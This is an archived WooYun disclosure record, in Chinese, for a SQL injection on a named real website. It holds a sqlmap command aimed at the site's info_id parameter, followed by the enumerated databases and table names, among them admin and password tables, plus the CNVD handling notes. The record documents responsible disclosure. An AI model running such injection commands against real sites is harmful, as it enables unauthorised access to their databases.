乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-03: 细节已通知厂商并且等待厂商处理中 2015-04-08: 厂商已经确认,细节仅向厂商公开 2015-04-18: 细节向核心白帽子及相关领域专家公开 2015-04-28: 细节向普通白帽子公开 2015-05-08: 细节向实习白帽子公开 2015-05-23: 细节向公众公开
sqlmap -u "http://www.sxdpf.org.cn/info/info_info.aspx" --data="info_id=8638"
available databases [8]:[*] cjresd[*] kangfu[*] master[*] model[*] msdb[*] ntyy[*] ntyy_en[*] tempdb
Database: cjresd[79 tables]+------------------------------------------+| 2ndCJRPASS || Menu || Menu_dept || admin || admin_dept || basicInfo || bmfw || businessInfo || business_introduce || business_remark || business_type || businessinfoLefttype || businessintroducelefttype || collectinfo || collectremark || collectremarkLeftinfo || fileup || front_Menu || gg || hdjl || img || press_introduce || press_type || pressinfo || pressinfolefttype || pressintroducelefttype || question || question_ip || regent || regent_ip || remark || special || special_activity_content || special_activity_content_left_special || special_activity_info || special_activity_info_left_special || special_activity_type || special_celebration_content || special_celebration_content_left_special || special_celebration_info || special_celebration_info_left_special || special_celebration_type || special_common_content || special_common_content_left_special || special_common_info || special_common_info_left_special || special_common_type || special_congress_content || special_congress_content_left_special || special_congress_info || special_congress_info_left_special || special_congress_type || special_link || special_party_content || special_party_content_left_special || special_party_info || special_party_info_left_special || special_party_type || special_sport_content || special_sport_content_left_special || special_sport_info || special_sport_info_left_special || special_sport_medal || special_sport_medal_left_special || special_sport_type || special_sport_video || special_sport_video_left_special || special_work_content || special_work_content_left_special || special_work_info || special_work_info_left_special || special_work_type || subscribe || videoInfo || video_type || videoinfoLefttype || webinfo || xxgk_apply || xzgkinfo |+------------------------------------------+
危害等级:中
漏洞Rank:10
确认时间:2015-04-08 08:05
CNVD确认并复现所述情况,已经转由CNCERT下发给山西分中心,由其后续协调网站管理单位处置
暂无